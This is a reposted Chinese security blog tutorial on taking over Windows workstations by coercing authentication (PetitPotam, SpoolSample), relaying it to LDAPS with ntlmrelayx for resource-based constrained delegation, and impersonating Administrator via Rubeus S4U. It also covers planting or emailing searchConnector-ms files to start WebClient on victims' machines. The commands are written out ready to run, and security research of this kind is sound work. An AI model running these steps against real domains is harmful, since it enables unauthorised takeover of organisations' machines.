从 RPC 到 RCE - 通过 RBCD 和 MS-RPC 接管工作站

admin 2022年6月30日23:31:55安全文章从 RPC 到 RCE - 通过 RBCD 和 MS-RPC 接管工作站已关闭评论3 views1660字阅读5分32秒阅读模式

在 Active Directory 的默认配置中,可以在其 WebClient 服务运行时远程接管工作站 (Windows 7/10/11) 和可能的服务器(如果安装了桌面体验)。简而言之,这是通过以下方式完成的;

  • 通过 MS-RPRN 或 MS-EFSRPC 通过 HTTP 触发机器身份验证这需要一组用于 RPC 调用的凭据。

  • 将该机器身份验证中继到 LDAPS 以配置 RBCD

  • RBCD 接管

需要注意的是,WebClient 服务不会在启动时自动启动。但是,如果已触发 WebClient 服务在工作站上启动(例如,通过某些 SharePoint 交互),您可以远程接管该系统。此外,有几种方法可以强制 WebClient 服务远程启动,我将在下面的一节中介绍这些方法。

RPC 到 RCE 的步骤

  1. 开始设置到 LDAPS 服务器的中继以配置 RBCD。

ntlmrelayx.py -t ldaps://dc.windomain.local --delegate-access

图片

  1. 尝试通过 HTTP 向您的中继触发机器身份验证。这可以通过众所周知的 RPC 调用(无疑还有其他各种未发布的调用)来完成

PetitPotam.exe logger@80/a.txt 192.168.38.104

图片

SpoolSample.exe 192.168.38.104 logger@80/asdf 

图片

注意这个关键步骤(远程机器身份验证)的工作;

  • WebClient 服务需要在目标(本例中为 192.168.38.104)上运行。它可能已经在某些工作站上启动。您可以通过 PowerShell 命令远程枚举它,该命令Get-NTFile -Win32Path '\\target-ip\pipe\DAV RPC SERVICE'返回命名管道(如果可访问)。

  • 您的攻击主机(logger在我的示例中)需要被视为目标划分的“内部网”。实现此目的的一种方法是使用攻击主机的 netbios 名称(无句点)。

  • 上面用于强制 HTTP 身份验证的 URI 语法(交换攻击主机名)。

  • 必须禁用 LDAP 签名/通道绑定(这是默认设置)。

  1. 如果强制执行机器身份验证,您应该会看到成功中继到 LDAPS(假设 DC 上未启用通道绑定/签名)。这将导致创建一个为其配置了 RBCD 的计算机帐户。如果无法创建机器帐户,您也可以为已经被入侵的机器配置 RBCD。

图片

  1. 从这里开始,只需遵循标准的 RBCD 接管方法即可。我切换到 Rubeus,因为我的 Linux 主机尚未配置 Kerberos 身份验证,但当然您可以从一台主机完成所有这些操作。

计算密码哈希: 

Rubeus.exe hash /password:NkQuBzsPk_AqKC6 /user:ZESLUQVX$ /domain:windomain.local

通过 S4U2Proxy 执行模拟: 

Rubeus.exe s4u /user:ZESLUQVX$ /rc4:D57DFD6E3BCDB1C2BF4D02CEE32F58C3 /impersonateuser:Administrator /msdsspn:cifs/WIN10.WINDOMAIN.LOCAL /ptt

图片

图片

强制 WebClient 服务启动

        在我的简短研究/测试中,我发现“搜索连接器”文件可用于启动 WebClient 服务如果您将所述文件放置在本地,它将在本地启动服务(允许 LPE),或者您可以将所述文件放置在您具有写入权限的 SMB 共享上。当域用户浏览该 SMB 共享并查看您植入的“searchConnector-ms”文件时,WebClient 服务将在他们的工作站上启动,您可以继续执行上面的步骤 2。当然,您也可以尝试 NTLM 中继用户身份验证,但我们在这里的讨论/目标只是让 WebClient 启动以启用机器接管。

图片

创建 SearchConnector-ms 文件: 

图片

图片

您可以将 HTTP 目标设置为攻击者主机,以便知道哪个工作站启动了 WebClient。

作为一种替代方法(尽管不那么隐蔽),您可以通过电子邮件向您的目标发送“搜索连接器”文件。如果用户尝试打开文件,WebClient 服务将在他们的工作站上启动。




特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月30日23:31:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  从 RPC 到 RCE - 通过 RBCD 和 MS-RPC 接管工作站 http://cn-sec.com/archives/1149142.html